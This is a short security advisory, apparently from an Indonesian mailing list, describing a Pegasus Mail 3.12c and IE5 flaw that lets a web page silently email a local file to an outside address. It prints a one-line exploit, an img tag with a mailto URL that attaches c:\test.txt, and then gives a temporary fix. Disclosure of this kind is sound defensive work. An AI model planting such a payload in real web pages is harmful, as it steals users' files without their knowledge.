Pegasus mail file reading vulnerability ------------------------------------------------------------------------ SUMMARY The default setup of Pegasus Mail contains a remotely exploitable security hole that allows a remote website to gain copies of files on the users hard drive. DETAILS Vulnerable systems: Pegasus Mail v3.12c with IE5.0 When the web page containing the exploit code is viewed using IE5, Pegasus mail will automatically creates a message which has a copy of the file "c:\test.txt" and is addressed to "[EMAIL PROTECTED]" and queues it ready to be sent without any further user intervention. If instead of "[EMAIL PROTECTED]" we have a local user called "hacker", the message won't be queued but just sent immediately. Exploit code: <img src="mailto:[EMAIL PROTECTED] -F c:\test.txt"> Temporary Fix: Don't run Pegasus Mail at the same time as a web browser. This is not a complete solution, as Pegasus Mail will load up if the exploit code is run, but this at least will be more noticeable to the user. -- Eko Sulistiono MIKRODATA & AntiVirus Media Web: http://www.mikrodata.co.id/ WAP: http://www.mikrodata.co.id/wap/index.wml This message contains no viruses. Guaranteed by AVP. ------------------------------------------------------------------------ Forum Komunikasi Penulis-Pembaca MIKRODATA (FKPPM) Informasi : http:[EMAIL PROTECTED] Arsip : http://www.mail-archive.com/forum%40mikrodata.co.id/ WAP : http://mikrodata.co.id/wap/index.wml Milis ini menjadi kontribusi beberapa rubrik yang diasuh tim MIKRODATA. Termasuk rubrik-rubrik yang ada di media lain. Memakai, Menyebarluaskan, dan Memperbanyak software bajakan adalah tindakan kriminal. Please check with the latest AVP update before you ask about virus: ftp://mikrodata.co.id/avirus_&_security/AntiViral_Toolkit_Pro/avp30.zip
